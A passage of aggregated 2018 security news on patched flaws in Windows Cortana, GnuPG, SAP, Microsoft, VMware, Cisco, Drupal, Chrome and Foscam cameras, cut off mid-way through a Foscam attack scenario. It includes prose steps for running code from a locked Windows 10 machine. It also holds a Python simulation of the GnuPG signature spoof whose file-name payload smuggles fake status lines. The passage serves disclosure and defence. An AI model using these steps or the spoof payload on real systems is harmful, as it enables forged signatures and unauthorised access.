“Armed with this knowledge, you can use your imagination to come up with specific keywords that could be used to start harvesting confidential information from the locked device,” the researcher notes.

Cortana attack leaks passwords

When hovering over a file in the search results provided by Cortana, the full path or content of the file would be displayed. When clicking on the file, it is launched using the appropriate program, but would only be accessible after the user logs in.

“At this point we can execute various preloaded Windows utilities such as calculator, but we cannot pass any parameters to the command line. We can open scripts including PowerShell, but instead of being executed, they will be opened in a text editor (notepad),” Cochin says.

Basically, “live off the land” attacks that abuse existing tools for malicious purposes cannot be performed because of a lack of parameters. Other nefarious operations, however, such as uninstalling applications, are possible even with these restrictions in place.

To execute code from the lock screen using Cortana, one would need to make sure the code is indexed (appears in the contextual menu). To get results to show up in the index of an authenticated user, an attacker can abuse OneDrive, where the contents of all shared folders with “edit” rights are indexed.

Thus, an attacker can drop an executable in the OneDrive folder, which can then even be executed as an administrator by simply right-clicking on it and selecting the “Run as administrator” option. Although a user account control (UAC) prompt could be triggered, the attack might still work, as users rarely check the content of the prompt before clicking through it.

Another option the attacker has is to use a non-portable executable (PE) malicious program, such as a PowerShell script. However, Cortana would only allow for the editing of such files, and would open them in Notepad instead of the default editor (PowerShell ISE).

When searching for txt, however, Cortana would display not only the text files, but also recently opened ones, such as the PowerShell script, and would provide a different contextual menu for them. Thus, an attacker could first edit the script, then search for txt, and simply select “Run with PowerShell” from the right-click menu.

“We now have local code execution with the payload of our choosing, without any exploit, even if the device is encrypted, on an up-to-date locked Windows 10 device. This technique helps us understand some of the differences between apps, documents, extensions, and the way Windows handles them from a locked or unlocked screen,” the security researcher explains.

Although code execution is now possible, there are limitations, as no command-line parameters can be passed. However, because it is possible to use the keyboard in addition to voice commands when interacting with Cortana from the lock screen, an attacker could use this to run the PowerShell code as an administrator.

“What can we do at this point? You name it. Our demo shows a password reset and login on a Windows 10 build, using only this simple technique,” the researcher notes.

To prevent exploitation of the vulnerability, even if it can only be abused with physical access to the vulnerable machine, one could turn off Cortana on the lock screen. Installing the recently released fixes for CVE-2018-8140 also mitigates the attack.


GnuPG Vulnerability Allows Spoofing of Message Signatures
15.6.2018 securityweek
Vulnerebility

GnuPG recently addressed an input sanitization vulnerability where a remote attacker could spoof arbitrary signatures.

Part of the GNU Project and also known as GPG, GnuPG is a complete and free implementation of the OpenPGP standard that enables the encryption and signing of data and communications. The hybrid-encryption software program has a versatile key management system and access modules for all kinds of public key directories.

GnuPG version 2.2.8, released earlier this month, addresses CVE-2018-12020, a vulnerability that Marcus Brinkmann, who discovered the bug, says affects GnuPG, Enigmail, GPGTools and python-gnupg. Brinkmann has dubbed the flaw SigSpoof.

“The signature verification routine in Enigmail 2.0.6.1, GPGTools 2018.2, and python-gnupg 0.4.2 parse the output of GnuPG 2.2.6 with a ‘--status-fd 2’ option, which allows remote attackers to spoof arbitrary signatures via the embedded ‘filename’ parameter in OpenPGP literal data packets, if the user has the verbose option set in their gpg.conf file,” he notes.

Status messages, GnuPG maintainer Werner Koch explains, are parsed by programs to get information from GPG about the validity of a signature. Status messages are created with the option “--status-fd N,” where N is a file descriptor. If N is 2, status messages and regular diagnostic messages share the stderr output channel.

The issue resides in the OpenPGP protocol allowing the inclusion of the file name of the original input file into a signed or encrypted message. The GnuPG tool can display a notice with that file name during decryption and verification, but it does not sanitize the file name, meaning that an attacker could include line feeds or other control characters in it.

Because of that, terminal control sequences could be injected, and the so-called status messages could be faked. Furthermore, the verification status of a signed email could also be faked.

“The attacker can inject arbitrary (fake) GnuPG status messages into the application parser to spoof signature verification and message decryption results. The attacker can control the key IDs, algorithm specifiers, creation times and user ids, and does not need any of the private or public keys involved,” Brinkmann explains.

He also notes that the injected status messages need to fit into 255 characters, the length limit of the file name field in OpenPGP literal data packets.

Brinkmann also published a proof of concept to show how signatures can be spoofed in Enigmail and GPGTools, and another to show how both the signature and encryption can be spoofed in Enigmail. Signature spoofing is also possible on the command line, he demonstrated.

While disabled by default, verbose is included in several recommended configurations for GnuPG, and it is one of the main causes for this vulnerability.

According to the researcher, users should make sure they don’t have verbose in gpg.conf and should avoid using gpg --verbose on the command line. Developers are advised to add --no-verbose to all invocations of gpg.
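
The mechanism described above (status lines and diagnostics sharing stderr, a file name that is echoed unsanitized and may contain a line feed) and the mitigation advice can both be shown in one small simulation. The Python below is an added example, not Brinkmann's PoC and not GnuPG, Enigmail or python-gnupg code: it constructs what an application reads from `--status-fd 2` when gpg runs with --verbose on a message whose literal-packet file name embeds fake status lines, parses that stream the naive way, and then applies control-character escaping in the spirit of the 2.2.8 fix (the exact escaping is assumed). The status line texts, the key ID, the user ID and the wording of the verbose notice are constructed for the demonstration.

```python
STATUS_PREFIX = "[GNUPG:] "

# Constructed attacker file name for the OpenPGP literal data packet: it closes
# the quoted name gpg prints under --verbose, injects fake status lines, and
# reopens a harmless-looking notice so the real diagnostic line looks intact.
SPOOF_FILENAME = (
    "x'\n"
    "[GNUPG:] GOODSIG 0000000000000000 Alice <alice@example.org>\n"
    "[GNUPG:] TRUST_FULLY 0 pgp\n"
    "gpg: original file name='x"
)


def verbose_notice(filename: str) -> str:
    """The diagnostic gpg emits for the literal packet's file name when
    --verbose is set (wording constructed to resemble the real notice)."""
    return f"gpg: original file name='{filename}'\n"


def sanitize_filename(name: str) -> str:
    """Escape control characters so a file name can never start a new line
    in the output, in the spirit of the 2.2.8 fix (exact escaping assumed)."""
    return "".join(
        ch if 0x20 <= ord(ch) < 0x7F else "\\x%02x" % ord(ch) for ch in name
    )


def merged_stderr(filename: str, real_status: list, sanitize: bool) -> str:
    """What an application sees on fd 2 when gpg is run with
    '--status-fd 2 --verbose': diagnostics and status lines interleaved."""
    name = sanitize_filename(filename) if sanitize else filename
    out = verbose_notice(name)
    for line in real_status:
        out += STATUS_PREFIX + line + "\n"
    return out


def parse_status(stream: str) -> list:
    """Naive consumer: trusts every line that starts with the status prefix."""
    return [
        line[len(STATUS_PREFIX):]
        for line in stream.splitlines()
        if line.startswith(STATUS_PREFIX)
    ]


def signature_verdict(status_lines: list) -> str:
    """How a mail client typically reduces status output to a UI verdict."""
    keywords = {line.split(" ", 1)[0] for line in status_lines}
    if "BADSIG" in keywords:
        return "bad signature"
    if "GOODSIG" in keywords:
        return "good signature"
    return "no signature"


if __name__ == "__main__":
    # The message is unsigned, so the only genuine status line is the
    # PLAINTEXT notice (constructed: format, timestamp, file name).
    real_status = ["PLAINTEXT 62 0 x"]
    print("file name fits the OpenPGP limit:", len(SPOOF_FILENAME.encode()) <= 255)
    spoofed = merged_stderr(SPOOF_FILENAME, real_status, sanitize=False)
    print("verbose, unsanitized:", signature_verdict(parse_status(spoofed)))
    fixed = merged_stderr(SPOOF_FILENAME, real_status, sanitize=True)
    print("verbose, sanitized:  ", signature_verdict(parse_status(fixed)))
    print("--no-verbose:        ", signature_verdict(real_status))
```

Three things make the spoof work together: the verbose notice, the unescaped line feed, and the decision to put status output on the same descriptor as diagnostics. Removing any one of them (--no-verbose as Brinkmann advises, the escaping in 2.2.8, or a dedicated --status-fd that the application reads separately from stderr) is enough to stop this particular attack.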

“The vulnerability in GnuPG goes deep and has the potential to affect a large part of our core infrastructure. GnuPG is not only used for email security, but also to secure backups, software updates in distributions, and source code in version control systems like Git,” Brinkmann claims.


Analyzing the SAP June 2018 Security Patch Day
15.6.2018 securityaffairs
Vulnerebility   

SAP’s June 2018 Security Patch Day includes five new Security Notes and five updates to previously released Notes, including two critical flaws rated Hot News.
The most common flaw types are Cross-Site Scripting and Remote Command Execution, followed by implementation flaws and information disclosure.

“It seems that the downward trend in the number of monthly notes is continuing. This month, a total of 14 security notes has been released, with only seven notes published today. Seven notes in total (50%) are tagged as High Priority or Hot News.” reads the post published by Onapsis.

The two Hot News Security Notes received CVSS scores of 9.8 and 9.1, respectively, they affect SAP Business Client (version 6.5) and SAP BASIS (versions 7.31, 7.40, 7.50, 7.51, 7.65, 7.66).

The first update is related to a Security Note released on April 2018 Patch Day, it addresses third-party web browser controls delivered with SAP Business Client, while the latter is an update for a Note released on November 2016 Patch Day that addresses an OS command injection vulnerability in the Report for Terminology Export component.

SAP June 2018 Security Patch Day also addresses four High severity vulnerabilities and four Medium risk flaws.

“On 12th of June 2018, SAP Security Patch Day saw the release of 5 Security Notes. Additionally, there were 5 updates to previously released security notes.” states the SAP’s advisory.

The most severe of the High priority flaws is an information disclosure vulnerability tracked as CVE-2018-2425 that affects SAP Business One. The flaw resides in the backup service of the Business One version for SAP HANA and could be exploited by an attacker to access restricted information.

“[CVE-2018-2425] Information Disclosure in SAP Business One for SAP HANA Backup Service (#2588475): Business One is SAP’s more lightweight ERP system designed for small to medium-sized businesses. The vulnerability discussed in the note exists in the Business One version for SAP HANA, more specifically in its backup service.” continues the analysis published by Onapsis.

“The note does not contain many details, but mentions the vulnerability allows an attacker to access information which would otherwise be restricted. It does seem the sensitive information exists in the backup service logs. The fix implies updating your Business One component software.”

The SAP June 2018 Security Patch Day also addresses a remote command execution flaw tracked as CVE-2015-0899 and a DoS issue tracked as CVE-2014-0050, both affecting SAP Internet Sales.

SAP also addressed the CVE-2018-2408 flaw described as an improper session management bug in SAP Business Objects.


SAP Releases Critical Updates for Two Security Notes
13.6.2018 securityweek 
Vulnerebility

Of the ten Security Notes in SAP’s June 2018 Security Patch Day, five were updates for previously released Notes, including two rated Hot News (Critical severity).

Impacting SAP Business Client (version 6.5) and SAP BASIS (versions 7.31, 7.40, 7.50, 7.51, 7.65, 7.66), the two Hot News Security Notes feature CVSS scores of 9.8 and 9.1, respectively.

The former is an update for a Security Note released on April 2018 Patch Day, described as security updates for third party web browser controls delivered with SAP Business Client, while the latter is an update for a Note released on November 2016 Patch Day, described as an OS command injection vulnerability in the Report for Terminology Export component.

The remaining Security Notes address four vulnerabilities considered High severity (including an update to a Security Note released on April 2018 Patch Day) and four Medium risk flaws (two are updates to Security Notes released on August 2014 Patch Day and May 2018 Patch Day, respectively), SAP’s advisory reveals.

The most important of the high-risk flaws is an information disclosure vulnerability (CVE-2018-2425) in SAP Business One (CVSS Base Score: 8.4). The bug exists in the Business One version for the SAP HANA backup service and could allow an attacker to access information which would otherwise be restricted, Onapsis explains.

Next in line is a remote command execution flaw (CVE-2015-0899) in SAP Internet Sales (CVSS Base Score: 7.5), followed by a denial-of-service bug (CVE-2014-0050) in SAP Internet Sales (CVSS Base Score: 7.3).

The last high-risk Security Note released this month is an update to a previous Note addressing CVE-2018-2408 (CVSS Base Score: 7.3), an improper session management bug in SAP Business Objects.

The Medium risk flaws addressed this month include a cross-site scripting (XSS) vulnerability in SAPUI5 (CVE-2018-2424) and information disclosure in UI5 Handler (CVE-2018-2428). They are accompanied by an update to a Security Note addressing a potential remote code execution in SAP CrystalReports, and another patching a missing XML validation vulnerability in SAP Identity Management (CVE-2018-2416).

According to ERPScan, a company that secures Oracle and SAP products, the June 2018 Patch Day also includes 4 Support Package Notes, for a total of 14 Notes. Half of the Notes were released after the second Tuesday of the last month and before the second Tuesday of this month.

The most common vulnerability types addressed this month are XSS and remote command execution, followed by implementation flaws and information disclosure. SAP also addressed XML external entity, DoS, OS command execution, and buffer overflow issues.


Microsoft Releases Mitigations for Spectre-Like 'Variant 4' Attack
13.6.2018 securityweek 
Vulnerebility

Updates released by Microsoft on Tuesday for its Windows operating system add support for a feature that should prevent attacks involving the recently disclosed speculative execution vulnerability known as “Variant 4.”

Researchers from several organizations warned in January that processors from Intel, AMD, ARM and other companies are affected by vulnerabilities that allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data. The flaws are tracked as Spectre (Variant 1 - CVE-2017-5753 and Variant 2 - CVE-2017-5715) and Meltdown (Variant 3 - CVE-2017-5754).

Last month, Intel, AMD, ARM, IBM, Microsoft and other major tech companies released updates, mitigations and advisories for two new variants of the speculative execution attack methods, namely Variant 3a and Variant 4.

Variant 4, which is similar to Spectre Variant 1, relies on a side-channel vulnerability known as Speculative Store Bypass (SSB) and it has been assigned the identifier CVE-2018-3639.

Microsoft has not identified any code patterns – in either its software or cloud services – that would allow Variant 4 attacks. However, the company announced on Tuesday – along with its monthly security updates – that it added support for Speculative Store Bypass Disable (SSBD) to Windows and Azure in an effort to completely eliminate the risk of attacks.

SSBD is designed to prevent a Speculative Store Bypass from occurring, but Microsoft noted that enabling the feature also requires microcode updates from Intel.

Microsoft has released updates that include the mitigation for Windows 10, Windows 7, Windows Server 2008, Windows Server 2016, and Windows Server versions 1709 and 1803. Support for SSBD has only been added for machines with Intel processors, but the company is working on updates for AMD devices as well. Systems powered by AMD CPUs will not require microcode updates.

When Variant 4 was disclosed, Intel announced that it had provided beta microcode updates to operating system vendors and equipment manufacturers to add support for SSBD.

However, Intel says the mitigation will be turned off by default and the company believes many will leave it that way.

Enabling SSBD may have some negative impact on performance, Microsoft and Intel said. Intel told customers last month that performance impact during its tests ranged between 2 and 8 percent.


Microsoft Patches 11 Critical RCE Flaws in Windows, Browsers
13.6.2018 securityweek 
Vulnerebility

Microsoft’s Patch Tuesday updates for June 2018 address a total of 50 vulnerabilities, including nearly a dozen critical remote code execution flaws affecting Windows and the company’s Edge and Internet Explorer web browsers.

None of the security holes patched this month appear to have been exploited for malicious purposes, but one of them has been publicly disclosed before the release of a fix. The disclosed vulnerability is a use-after-free issue that allows an attacker to execute arbitrary code if they can convince the targeted user to open a malicious web page or file. The weakness was reported to Microsoft through Trend Micro’s Zero Day Initiative (ZDI), which made some details public after its 120-day deadline expired.

The list of critical vulnerabilities also includes CVE-2018-8225, which impacts the Windows DNS component DNSAPI.dll. An attacker can leverage this flaw to execute arbitrary code in the context of the Local System Account by using a malicious DNS server to send specially crafted DNS responses to the targeted system.

Another critical RCE flaw, which Microsoft believes could be exploited in the wild at some point, is CVE-2018-8251 and it impacts the Windows Media Foundation component. An attacker can exploit this flaw to take complete control of a system by getting the targeted user to open a malicious web page or document.

A security hole affecting the HTTP Protocol Stack (Http.sys) allows remote code execution by sending a specially crafted packet to the targeted server. While the flaw can be exploited without authentication and is considered critical, Microsoft believes exploitation is “less likely.”

The latest security updates also resolve a privilege escalation vulnerability affecting the Cortana voice assistant. The flaw, related to an issue disclosed earlier this year by researchers Amichai Shulman and Tal Be’ery, has been classified as “important” as exploitation requires physical or console access and the targeted system needs to have Cortana enabled.

Microsoft also released some mitigations for the recently disclosed Variant 4 of the Spectre/Meltdown vulnerabilities.

Adobe has yet to release any Patch Tuesday updates, but the company did resolve a Flash Player zero-day vulnerability earlier this month. The researchers who came across the exploit revealed that the flaw had been leveraged in attacks aimed at entities in the Middle East.


Microsoft Patch Tuesday updates for June 2018 addresses 11 Critical RCE Flaws
13.6.2018 securityaffairs
Vulnerebility

Microsoft issued Patch Tuesday updates for June 2018 that address a total of 50 vulnerabilities, 11 of which are critical remote code execution flaws.
The updates cover 11 critical remote code execution vulnerabilities and 39 issues rated as important.

The tech giant also issued some mitigations for the recently discovered Spectre/Meltdown Variant 4 vulnerabilities.

The critical issues affect Windows and the company's web browsers, Edge and Internet Explorer.

None of the patched vulnerabilities have been exploited in attacks in the wild, but one of them, a remote code execution flaw in the scripting engine tracked as CVE-2018-8267, was publicly disclosed before the release of a fix.

The flaw is a remote memory-corruption issue in the Internet Explorer rendering engine. It is triggered when the engine fails to properly handle error objects; an attacker could exploit it to execute arbitrary code in the context of the currently logged-in user.

Microsoft acknowledged the security researcher Dmitri Kaslov for reporting the flaw.

The most critical flaw addressed by the Patch Tuesday updates for June 2018 is a remote code execution vulnerability tracked as CVE-2018-8225 that resides in the Windows Domain Name System (DNS) component DNSAPI.dll.

The flaw affects all Windows versions from 7 to 10, as well as Windows Server editions, and stems from the way Windows parses DNS responses.

An attacker could exploit the flaw by sending corrupted DNS responses to a targeted system from an attacker-controlled malicious DNS server. Successful exploitation allows running arbitrary code in the context of the Local System Account.

“This vulnerability could allow an attacker to execute code at the local system level if they can get a crafted response to the target server. There are a couple of ways this could happen.” reads the analysis published by Trend Micro Zero Day Initiative (ZDI).

“The attacker could attempt to man-in-the-middle a legitimate query. The more likely scenario is simply tricking a target DNS server into querying an evil server that sends the corrupted response – something that can be done from the command line. It’s also something that could be easily scripted. This means there’s a SYSTEM-level bug in a listening service on critical infrastructure servers, which also means this is wormable.”


Another critical flaw addressed with the Patch Tuesday updates for June 2018 is a remote code execution flaw tracked as CVE-2018-8231 that resides in the HTTP protocol stack (HTTP.sys) of Windows 10 and Windows Server 2016.

The flaw could allow remote attackers to execute arbitrary code and take control of the affected systems.

This vulnerability originates when HTTP.sys improperly handles objects in memory, allowing attackers to send a specially crafted packet to an affected Windows system to trigger arbitrary code execution.

“This patch covers another serious bug in a web-facing service. This time, the web server component http.sys is affected. A remote attacker could cause code execution by sending a malformed packet to a target server. Since http.sys runs with elevated privileges, the attacker’s code would get that same privilege.” continues ZDI.

The Patch Tuesday updates for June 2018 also address a privilege escalation vulnerability in the Cortana voice assistant, tracked as CVE-2018-8140 and rated as “important.”

In this case, the attacker needs physical or console access to the system to trigger the flaw.


VMware addresses a critical remote code execution vulnerability in AirWatch Agent
12.6.2018 securityaffairs
Vulnerebility

VMware has found a critical remote code execution vulnerability in the AirWatch Agent applications for Android and Windows Mobile.
The agent is installed by users on a mobile device in order to allow AirWatch to manage it.

The flaw, tracked as CVE-2018-6968, “may allow for unauthorized creation and execution of files in the Agent sandbox and other publicly accessible directories such as those on the SD card by a malicious administrator.”

“Due to an authorization flaw in the real-time File Manager capability for Android and Windows Mobile devices and Registry Manager for Windows Mobile devices, it is possible for a remote attacker with knowledge of specific enrolled devices within an AirWatch instance to add or remove files from a device, remotely execute commands on the device, or modify or set Registry Key values for Windows Mobile devices that are configured to use AirWatch Cloud Messaging (AWCM).” reads the advisory published by VMware.

“This vulnerability is identified by CVE-2018-6968 and is documented in VMSA-2018-0015”

“The attacker does not need access to the Workspace ONE UEM Console. Access to read and store files on Android devices is limited to files within the Agent sandbox and other publicly accessible directories such as those on the SD card. Access to files on Windows Mobile/CE devices involves the entire device directory,” it added.


VMware has addressed the flaw with the release of version 8.2 for Android and 6.5.2 for Windows Mobile; the iOS version of the VMware AirWatch agent is not impacted.

A workaround was also provided for Android users, who can select C2DM/GCM instead of AWCM as their push notification service.

The security updates address the vulnerability by disabling the flawed file, task, and registry management capabilities. VMware will deprecate the functionality in the coming months.

“Through mitigation of this security vulnerability, the File, Task & Registry Management capabilities built into AWCM will be disabled in current SaaS environments over the coming weeks. Additionally, this functionality will be deprecated in future releases of the Workspace ONE UEM Console.”


VMware Patches Code Execution Flaw in AirWatch Agent
12.6.2018 securityweek 
Vulnerebility

VMware has addressed a critical remote code execution vulnerability in the AirWatch Agent applications for Android and Windows Mobile.

The VMware Workspace ONE platform, which is powered by AirWatch unified endpoint management (UEM) technology, is designed to help organizations manage corporate endpoints and improve enterprise productivity.

Workspace ONE provides a File Manager application for Android and Windows Mobile/CE and Task/Registry Manager apps for Windows Mobile/CE. These apps use legacy technologies and they are separate from the ones available through the AirWatch platform.

VMware has published an advisory and a support article to warn users that these mobile applications are affected by a critical vulnerability tracked as CVE-2018-6968.

“Due to an authorization flaw in the real-time File Manager capability for Android and Windows Mobile devices and Registry Manager for Windows Mobile devices, it is possible for a remote attacker with knowledge of specific enrolled devices within an AirWatch instance to add or remove files from a device, remotely execute commands on the device, or modify or set Registry Key values for Windows Mobile devices that are configured to use AirWatch Cloud Messaging (AWCM),” VMware said.

“The attacker does not need access to the Workspace ONE UEM Console. Access to read and store files on Android devices is limited to files within the Agent sandbox and other publicly accessible directories such as those on the SD card. Access to files on Windows Mobile/CE devices involves the entire device directory,” it added.

The security hole has been patched with the release of version 8.2 for Android and 6.5.2 for Windows Mobile. The iOS version of the agent is not impacted.

The updates address the problem by disabling the flawed file, task and registry management capabilities, and VMware says it plans on deprecating the functionality in future releases of the Workspace ONE console.

In late May, VMware informed customers of a vulnerability that allowed a local attacker to escalate privileges to root on Linux machines running VMware Horizon Client for Linux.


Cisco removed hardcoded credentials in WAAS software. Undocumented accounts are a frequent issue
9.6.2018 securityaffairs  
Vulnerebility

Cisco has removed hardcoded credentials from Cisco Wide Area Application Services (WAAS), a product designed to optimize WAN traffic.
The hardcoded credential (CVE-2018-0329) is a read-only SNMP community string in the configuration file of the SNMP daemon; it could be exploited by attackers to read any data that is accessible via SNMP on the affected device.

“A vulnerability in the default configuration of the Simple Network Management Protocol (SNMP) feature of Cisco Wide Area Application Services (WAAS) Software could allow an unauthenticated, remote attacker to read data from an affected device via SNMP.” states the security advisory published by Cisco.

“The vulnerability is due to a hard-coded, read-only community string in the configuration file for the SNMP daemon. An attacker could exploit this vulnerability by using the static community string in SNMP version 2c queries to an affected device.”

There are no workarounds that address this vulnerability.

The SNMP community string is hidden from administrators, which means there was no way to spot the vulnerability during regular configuration audits.

The flaw was reported by the security researcher Aaron Blair while investigating CVE-2018-0352, a privilege escalation flaw in the Cisco Wide Area Application Services Software Disk Check Tool.

“A vulnerability in the Disk Check Tool (disk-check.sh) for Cisco Wide Area Application Services (WAAS) Software could allow an authenticated, local attacker to elevate their privilege level to root. The attacker must have valid user credentials with super user privileges (level 15) to log in to the device.” reads the security advisory.

“The vulnerability is due to insufficient validation of script files executed in the context of the Disk Check Tool. An attacker could exploit this vulnerability by replacing one script file with a malicious script file while the affected tool is running. A successful exploit could allow the attacker to gain root-level privileges and take full control of the device.”

Blair exploited CVE-2018-0352, the privilege escalation in the WAAS disk check tool, to elevate his privileges to root, an access level that allowed him to discover the hidden SNMP community string inside the /etc/snmp/snmpd.conf file.


Unfortunately, hardcoded credentials and undocumented accounts are not uncommon in Cisco appliances; the company addressed similar issues in Prime Collaboration Provisioning (PCP), in the Cisco IOS XE operating system, and in the Digital Network Architecture (DNA) Center.


Cisco patches a critical vulnerability in Prime Collaboration Provisioning solution
9.6.2018 securityaffairs
Vulnerebility

Cisco fixed several flaws in the Prime Collaboration Provisioning product that allows customers to manage their communications services.
Cisco released security patches to address severe vulnerabilities in Prime Collaboration Provisioning (PCP) solution, one of the issues was rated as critical.

The vulnerabilities have been found by Cisco during internal security testing and there is no evidence of attacks exploiting the flaws in the wild.

Prime Collaboration Provisioning is a web-based provisioning product that allows customers to manage their communications services.

The critical vulnerability, tracked as CVE-2018-0321, could be exploited by a remote and unauthenticated attacker to access the Java Remote Method Invocation (RMI) system and perform malicious actions that affect both the PCP and the devices connected to the solution.

“A vulnerability in Cisco Prime Collaboration Provisioning (PCP) could allow an unauthenticated, remote attacker to access the Java Remote Method Invocation (RMI) system.” reads the security advisory published by Cisco.

“The vulnerability is due to an open port in the Network Interface and Configuration Engine (NICE) service. An attacker could exploit this vulnerability by accessing the open RMI system on an affected PCP instance. An exploit could allow the attacker to perform malicious actions that affect PCP and the devices that are connected to it.”

Cisco confirmed that there are no workarounds that address this vulnerability.

Cisco also reported five high severity vulnerabilities in the Prime Collaboration Provisioning solution, two of which could be exploited by an unauthenticated attacker to reset the password on vulnerable products and gain admin-level privileges by sending a specially crafted password reset request.

Another high severity vulnerability could be exploited by an unauthenticated attacker to execute arbitrary SQL queries. Cisco also fixed high severity access control vulnerabilities that could lead to privilege escalation.

Customers should update Prime Collaboration Provisioning to version 12.3.

The flaws have been identified by experts from Cisco during internal security testing.


Cisco also fixed an information disclosure bug in Meeting Server, and a DoS vulnerability that affects several products of the IT giant.


Drupal Refutes Reports of 115,000 Sites Still Affected by Drupalgeddon2
8.6.2018 securityweek
Vulnerebility

The Drupal Security Team has refuted reports that at least 115,000 websites are still vulnerable to Drupalgeddon2 attacks, arguing that the methodology used by the researcher who announced that number is flawed.

Researcher Troy Mursch recently conducted an analysis of websites running Drupal 7, the most widely used version of the content management system (CMS), and apparently found that many of them had still not patched the Drupalgeddon2 vulnerability.

Mursch identified nearly 500,000 Drupal 7 websites through the PublicWWW source code search engine and found that 115,070 had been running older versions of the CMS. The analysis showed that roughly 134,000 sites had not been vulnerable, while for 225,000 the version of Drupal they had been using could not be determined.

These numbers are apparently based on data from the publicly accessible “CHANGELOG.txt” file found on each website – sites using Drupal 7.58 or a later version were classified as not vulnerable while earlier versions were counted as affected.

“Checking the contents of CHANGELOG.txt is not a valid way to determine whether a site is vulnerable to any given attack vector,” the Drupal Security Team said in a statement posted on its website and sent out to journalists. “Patches distributed by the Drupal security team to fix the issues were widely used, but did not touch CHANGELOG.txt or any version strings defined elsewhere. There are also other mitigations that vendors have provided which would also not affect CHANGELOG.txt but would protect the site.”

“We believe the presented numbers to be inaccurate. We consider it to be misleading to draw conclusions from this sparse information,” it added.

In an update to his initial blog post, Mursch says it’s impossible to determine exactly how many Drupal websites are still vulnerable to Drupalgeddon2 attacks without actually attempting to exploit the vulnerability.

“While we know 115,000 sites are using outdated Drupal versions, based on the publicly accessible CHANGELOG.txt found on each site, it’s possible someone applied a mitigation patch. However, the problem is we have no way of telling if they did unless we perform the actual exploit,” Mursch said.

“Unfortunately, attempting the exploit on nearly half a million sites would be highly illegal. Due to this, I won’t be performing the exploit or any variant of it to prove all the sites are vulnerable. The fact remains that each one of the 115,000 sites is using an outdated version of Drupal,” he added.

Drupalgeddon2, tracked as CVE-2018-7600, allows a remote attacker to execute arbitrary code and take complete control of a website running Drupal 6, 7 or 8. The flaw has been patched with the release of versions 7.58, 8.5.1, 8.3.9 and 8.4.6, with fixes also available for the outdated Drupal 6.

Drupalgeddon2 has been exploited by malicious actors to deliver cryptocurrency miners, backdoors, RATs and tech support scams.

During the analysis of Drupalgeddon2, the Drupal Security Team and the developer who reported the original vulnerability identified another flaw. This second vulnerability, tracked as CVE-2018-7602 and dubbed by some Drupalgeddon3, has also been exploited in the wild.


Cisco Patches Severe Vulnerabilities in Prime Collaboration Provisioning
8.6.2018 securityweek
Vulnerebility

Cisco informed customers this week that it has patched one critical and five high severity vulnerabilities in Prime Collaboration Provisioning (PCP), a web-based provisioning solution that allows organizations to manage their communications services.

The critical flaw, CVE-2018-0321, allows a remote and unauthenticated attacker to access the Java Remote Method Invocation (RMI) system and perform actions that affect both the PCP and the devices connected to it.

The list of high severity vulnerabilities affecting PCP includes two issues that allow an unauthenticated attacker to reset the password on affected systems and gain admin-level privileges by sending a specially crafted password reset request.

Another high severity bug allows an unauthenticated attacker to execute arbitrary SQL queries. The remaining high severity vulnerabilities are access control issues that allow authenticated attackers to elevate their privileges.

Users can patch all the PCP vulnerabilities by updating to version 12.3, but fixes for some of these flaws are included in versions 12.1 and 12.2. The security holes have been identified by Cisco during internal security testing and there is no evidence of exploitation in the wild.

Cisco also fixed a critical vulnerability, tracked as CVE-2018-0315, in the authentication, authorization, and accounting (AAA) security services of Cisco IOS XE software. An attacker can exploit this flaw remotely to execute arbitrary code on a device or cause a denial-of-service (DoS) condition.

Other high severity problems patched this week include DoS vulnerabilities in IP Phone and Adaptive Security Appliance (ASA) products, a security bypass in Cisco Web Security Appliance (WSA), and a command execution vulnerability in Network Services Orchestrator (NSO).

Cisco’s advisories also describe an information disclosure bug in Meeting Server, and a DoS vulnerability impacting multiple products.

Patches are available for all these flaws and there is no evidence of malicious exploitation.


Update Google Chrome Immediately to Patch a High Severity Vulnerability
8.6.2018 thehackernews 
Vulnerebility

You must update your Google Chrome now.
Security researcher Michał Bentkowski discovered and reported a high severity vulnerability in Google Chrome in late May, affecting the web browsing software for all major operating systems including Windows, Mac, and Linux.
Without revealing any technical detail about the vulnerability, the Chrome security team described the issue as incorrect handling of CSP header (CVE-2018-6148) in a blog post published today.
"Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed," the Chrome security team notes.
Content Security Policy (CSP) header allows website administrators to add an extra layer of security on a given web page by allowing them to control resources the browser is allowed to load.

Mishandling of CSP headers by your web browser could enable attackers to perform cross-site scripting, clickjacking and other types of code injection attacks on targeted web pages.
The patch for the vulnerability has already been rolled out to users in the stable Chrome update 67.0.3396.79 for Windows, Mac, and Linux, which users may have already received or will receive over the coming days or weeks.
So, make sure your system is running the updated version of the Chrome web browser. We'll update the article as soon as Google releases further updates.
A new version of the Firefox web browser, 60.0.2, has also been released, which includes security and bug fixes. So, users of the stable version of Firefox are also recommended to update their browser.


Multiple models of IP-based cameras from Chinese firm Foscam could be easily hacked. Update the firmware now!
8.6.2018 securityaffairs
Vulnerebility

A security vulnerability was discovered in webcams, IP surveillance cameras and also baby monitors manufactured by the Chinese firm Foscam.
The Chinese firm Foscam has released firmware updates to address three vulnerabilities in multiple models of IP-based cameras that could be exploited to take control of vulnerable cameras exposed online.

The following flaws were reported by the experts from IoT security firm VDOO:

CVE-2018-6830
CVE-2018-6831
CVE-2018-6832
Chaining the three flaws, attackers could completely take over the Foscam cameras.

The experts from VDOO have published a technical analysis of the three vulnerabilities, including proof-of-concept code.

“One of the vendors for which we found vulnerable devices was Foscam, when our team discovered a critical chain of vulnerabilities in Foscam security cameras. Combining the discovered vulnerabilities, if an adversary successfully obtains the address of the camera, he can gain root access to the affected cameras remotely (over LAN or the internet).” reads the analysis published by VDOO.

“VDOO has responsibly disclosed these vulnerabilities (CVE-2018-6830, CVE-2018-6831 and CVE-2018-6832) and engaged with Foscam security team to solve the matter.”

Below is the attack scenario described by VDOO for a network-accessible camera:

The attack scenario on a network-accessible camera is as follows:

Step 1: An adversary must first obtain the camera’s IP address or DNS name. It can be achieved in several ways, including:
If the camera and the network are configured by the user such that the camera has direct interface to the internet, its address might be revealed by some internet scanners.
If the adversary gained unauthorized (remote or local) access to a network to which the camera is connected, he might be able to find the local address of the camera.
If dynamic DNS is enabled by the user, the adversary might find a way to resolve the device name
Step 2: The adversary then uses CVE-2018-6830, an arbitrary file deletion vulnerability, to delete certain critical files that will result in authentication bypass when the webService process reloads.
